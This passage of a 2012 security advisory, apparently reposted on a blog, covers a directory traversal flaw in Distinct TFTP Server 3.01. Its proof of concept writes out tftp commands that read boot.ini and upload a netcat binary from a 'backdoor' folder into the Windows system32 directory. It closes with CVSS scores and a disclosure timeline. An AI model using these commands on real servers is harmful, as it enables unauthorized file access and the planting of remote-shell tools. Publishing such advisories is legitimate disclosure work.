Proof of Concept
---------------- |
We assume that the
directory is deep enough, so you have to set a deep path on the server
configuration. If a GET request followed with '../../' (dot dot slash),
trying to retrieve boot.ini file, is sent to Distinct TFTP Server
3.01, the file will be retrieved successfully. |
hell:~ modpr0be$ tftp -e 10.211.55.5 69 |
tftp> get ../../../../../../../../../../../../../boot.ini |
Received 211 bytes in 0.0 seconds |
tftp> |
Next, if we try to upload
a file, let say Netcat (nc.exe), to Windows %systemroot% directory
(C:\WINDOWS\system32\) using a PUT command, here is the result: |
hell:~ modpr0be$ tftp -e 10.211.55.5 69 |
tftp> put /Pentest/backdoor/nc.exe ../../../../../../../../../../../../../../../Windows/system32/nc.exe |
Sent 59392 bytes in 0.3 seconds |
tftp> |
Netcat successfully uploaded. |
Another combinations: |
tftp> get ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini |
tftp> put /Pentest/backdoor/nc.exe ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\nc.exe |
Solution Status |
--------------- |
Unavailable |
Risk Factor |
----------- |
CVSS Base Score = 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) |
Exploitability Subscore = 10 |
Impact Subscore = 4.9 |
CVSS Temporal Score = 5.2 |
Overall CVSS Score = 5.8 |
Risk factor = Medium |
Credits |
------- |
Tom Gregory from Spentera Research |
References |
---------- |
http://www.spentera.com/advisories/2012/SPN-01-2012.pdf |
Disclosure Timeline |
------------------- |
March 28, 2012, issue discovered |
March 28, 2012, vendor contacted about the issue, no response |
April 9, 2012, public advisory released
0 comments:
Post a Comment